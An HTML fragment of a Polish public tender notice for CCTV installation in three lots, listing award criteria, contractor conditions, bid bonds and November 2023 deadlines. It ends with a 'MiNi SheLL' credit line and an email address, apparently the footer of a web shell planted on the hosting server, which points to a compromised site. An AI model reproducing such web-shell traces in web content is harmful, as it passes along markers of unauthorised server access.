okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają<br/>wykluczeniu na zasadach określonych w rozdziale 17 SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki<br/>dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej:<br/>a)	dla części 1 zamówienia jedną usługę polegająca na montażu lub modernizacji systemu CCTV o wartości nie mniejszej niż 40 000,00 zł brutto (słownie: czterdzieści tysięcy złotych 00/100), <br/>b)	dla części 2 zamówienia jedną usługę polegająca na montażu lub modernizacji systemu CCTV o wartości nie mniejszej niż 40 000,00 zł brutto (słownie: czterdzieści tysięcy złotych 00/100),<br/>c)	dla części 3 zamówienia jedną usługę polegająca na montażu lub modernizacji systemu CCTV o wartości nie mniejszej niż 40 000,00 zł brutto (słownie: czterdzieści tysięcy złotych 00/100). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający, na podstawie art. 105-106 ustawy Pzp, na potwierdzenie zgodności oferowanych do realizacji przedmiotu zamówienia urządzeń i elementów systemu CCTV z wymaganiami określonymi w Załączniku 1b do PPU dla części I – III (Specyfikacja techniczna urządzeń podlegających montażowi), żąda złożenia wraz z ofertą następujących przedmiotowych środków dowodowych: <br/>1)	zestawienie parametrów oferowanych urządzeń i elementów systemu CCTV, stanowiące Załącznik 1 do formularza ofertowego dla części I – III - w zależności od składanej oferty. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zestawienie parametrów oferowanych urządzeń i elementów systemu CCTV, stanowiące Załącznik 1 do formularza ofertowego dla części I – III - w zależności od składanej oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda wniesienia wadium w kwocie:<br/>dla części I zamówienia: 500,00 zł (słownie: pięćset złotych 00/100).<br/>dla części II zamówienia: 800,00 zł (słownie: osiemset złotych 00/100)<br/>dla części III zamówienia: 1 000,00 zł (słownie: jeden tysiąc złotych 00/100)<br/><br/>Pozostałe informację dot. wadium opisane zostały w rozdziale 29 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy opisane zostały w § 13 Załącznika nr 13 do SWZ (PPU). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-08 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com